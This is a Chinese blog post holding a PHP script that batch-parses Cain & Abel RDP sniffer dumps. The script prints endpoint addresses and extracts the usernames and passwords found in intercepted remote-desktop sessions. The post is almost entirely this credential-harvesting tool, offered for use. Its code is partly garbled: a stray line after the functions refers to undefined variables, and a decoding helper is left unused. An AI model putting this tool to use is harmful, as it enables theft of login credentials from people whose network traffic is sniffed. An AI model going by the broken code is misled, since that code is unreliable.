cain嗅探rdp文件批量解析

作者: admin 分类: 未分类 发布时间: 2016-03-06 04:40
<?php
//Author Wdot
//Site:http://wdot.cc
//Usage: php CainRdpParser.php /tmp/1.txt        # parse a single Cain RDP dump file
//Usage: php CainRdpParser.php /tmp/RDP/        # parse every file in a directory (keep the trailing slash: the directory path is joined to each entry name as-is)
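error_reporting(E_ERROR);

// Entry point: one argument, either a Cain RDP dump file or a directory of them.
// The original indexed $argv[1] unchecked; with no argument it raised a notice
// (masked by error_reporting) and silently did nothing.
if (!isset($argv[1]) || $argv[1] === '') {
    fwrite(STDERR, 'usage: php CainRdpParser.php <dump-file|directory>' . PHP_EOL);
    exit(1);
}
$target = $argv[1];
if (is_dir($target)) {
    // Join with an explicit separator so "/tmp/RDP" and "/tmp/RDP/" both work;
    // the original concatenated directly, turning "/tmp/RDP" + "1.txt" into "/tmp/RDP1.txt".
    $dir = rtrim($target, '/\\');
    $entries = scandir($dir);
    if ($entries === false) {
        fwrite(STDERR, "cannot read directory \"$target\"" . PHP_EOL);
        exit(1);
    }
    foreach ($entries as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $entry;
        // scandir() lists subdirectories as well; rdpParser() expects a regular file.
        if (is_file($path)) {
            rdpParser($path);
        }
    }
} elseif (is_file($target)) {
    rdpParser($target);
} else {
    fwrite(STDERR, "\"$target\" is neither a file nor a directory" . PHP_EOL);
    exit(1);
}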

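/**
 * Parse one Cain & Abel RDP sniffer dump and print what it reveals.
 *
 * Prints a "FILE:" header, echoes every line of the form "<word> address: ..."
 * (the endpoint lines), then locates the first "[Client decrypted packet]" hex
 * dump and prints the username and password found in it, followed by a
 * separator line. Only the first decrypted packet is examined; the loop breaks
 * after it, exactly as before.
 *
 * Fixes over the original: fopen() failure is reported instead of crashing on
 * fgets(false); a dump with fewer hex runs than the hard-coded offset expects
 * is reported instead of indexing past the array; the credentials are no
 * longer passed through unicode_decode(), which lowercased them and dropped
 * every non-word character (a password such as "P@ss" came out as "pss"); and
 * control characters in the recovered bytes are escaped before they reach the
 * terminal, because the dump content comes straight off a sniffed session and
 * is untrusted.
 *
 * @param string $filename path to a Cain RDP dump file
 * @return void everything is printed; nothing is returned
 */
function rdpParser($filename)
{
    $crlf = "\r\n";
    if (!file_exists($filename)) {
        print "file \"$filename\" not exists...$crlf";
        return;
    }
    $rdpH = fopen($filename, 'r');
    if ($rdpH === false) {
        print "file \"$filename\" cannot be opened...$crlf";
        return;
    }
    print "FILE:" . basename($filename) . $crlf;
    while (!feof($rdpH)) {
        $line = trim(fgets($rdpH));
        if (preg_match("/\w+.address:.*?$/", $line)) {
            print $line . $crlf;
        }
        if (!preg_match("/^\[Client decrypted packet\]/", $line)) {
            continue;
        }
        // The hex dump runs until the next blank line (or EOF). Each dump line is
        // taken as a 5-character offset column followed by up to 48 characters of
        // "XX " cells; that layout is Cain's and is kept as the original had it.
        $packet = '';
        while (!empty($line)) {
            $line = trim(fgets($rdpH));
            $packet .= substr($line, 5, 48);
        }
        $fields = cainCredentialFields($packet);
        if ($fields === null) {
            print "credential block not found (dump has fewer hex runs than expected)$crlf";
            break;
        }
        $shown = 0;
        foreach ($fields as $hex) {
            // '' and a lone nibble such as '0' are split artefacts, not data.
            if (strlen($hex) < 2 || $shown >= 2) {
                continue;
            }
            $label = ($shown === 0) ? 'username' : 'password';
            print $label . ":\t" . cainPrintableField($hex) . $crlf;
            $shown++;
        }
        break;
    }
    fclose($rdpH);
    print "-------------------------------$crlf";
}

/**
 * Locate the credential run inside a reassembled hex dump and split it into
 * fields.
 *
 * The dump text (spaces removed) is cut at every run of ten '0' characters
 * (five NUL bytes when the cut happens to be byte-aligned). The author's
 * empirical observation is that the run holding the credentials sits 27 runs
 * before the end of the packet; that offset is kept verbatim. Inside that run
 * the fields are separated by "0000" — a double NUL, which looks like the
 * terminator of UTF-16 strings. The cut is made on the hex text, not at byte
 * offsets, so the fields are not guaranteed to be byte-aligned.
 *
 * @param string $packet hex dump text, possibly still containing spaces
 * @return string[]|null the fields of the credential run, or null when the
 *                       dump has fewer than 27 runs
 */
function cainCredentialFields($packet)
{
    $runs = explode('0000000000', str_replace(' ', '', $packet));
    $idx = count($runs) - 27;
    if ($idx < 0) {
        return null;
    }
    return explode('0000', $runs[$idx]);
}

/**
 * Turn one hex field into a printable string.
 *
 * The credential bytes appear to be UTF-16 (every other byte NUL, double-NUL
 * terminator), but because the field boundaries are found in the hex text
 * rather than at byte offsets a field may start mid-code-unit, so a real
 * UTF-16 decode cannot be relied on here. Dropping the NUL bytes instead
 * recovers ASCII credentials exactly — case and punctuation included —
 * regardless of alignment, which is what the lowercase, word-characters-only
 * unicode_decode() path lost. Non-ASCII code units come through as raw bytes.
 * Control characters are C-escaped so that bytes taken from a sniffed session
 * cannot inject terminal escape sequences into the operator's console.
 *
 * @param string $hex hex digits; a field that is not hex is shown as-is rather
 *                    than letting pack() warn and return false
 * @return string printable rendering of the field
 */
function cainPrintableField($hex)
{
    if (!preg_match('/^[0-9A-Fa-f]+$/', $hex)) {
        return addcslashes($hex, "\0..\37\177");
    }
    $bytes = pack('H*', $hex);
    $text = str_replace("\0", '', $bytes);
    return addcslashes($text, "\0..\37\177");
}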
/**
 * Lowercase a string, keep only runs of word characters, and expand "\uXXXX"
 * escapes (four hex digits) into UTF-8.
 *
 * Everything that is neither a word character nor part of a \u escape —
 * punctuation, whitespace, NUL bytes — is discarded, and ASCII letters come
 * back lowercase, so this is a lossy rendering rather than a reversible decode.
 * Each \uXXXX escape becomes the two bytes XX XX in the order written and is
 * handed to iconv as "UCS-2"; when the conversion fails iconv returns false
 * and nothing is appended. NOTE(review): the byte order of unmarked "UCS-2" is
 * up to the iconv implementation (big-endian on glibc), which is what this
 * byte ordering appears to assume.
 *
 * @param string $name input text, possibly containing \uXXXX escapes
 * @return string lowercased, filtered and unescaped text
 */
function unicode_decode($name)
{
    $lowered = strtolower($name);
    $tokenPattern = '/([\w]+)|(\\\u([\w]{4}))/i';
    preg_match_all($tokenPattern, $lowered, $found);
    if (empty($found)) {
        return $lowered;
    }
    $out = '';
    foreach ($found[0] as $token) {
        if (substr($token, 0, 2) !== '\\u') {
            $out .= $token;
            continue;
        }
        // "\uXXXX": first hex pair, then second hex pair, converted from UCS-2 to UTF-8.
        $first = chr((int) base_convert(substr($token, 2, 2), 16, 10));
        $second = chr((int) base_convert(substr($token, 4), 16, 10));
        $out .= iconv('UCS-2', 'UTF-8', $first . $second);
    }
    return $out;
}
	print(($times==0)?'username':'password').":\t".unicode_decode(pack('H*',$value)).$crf;
?>
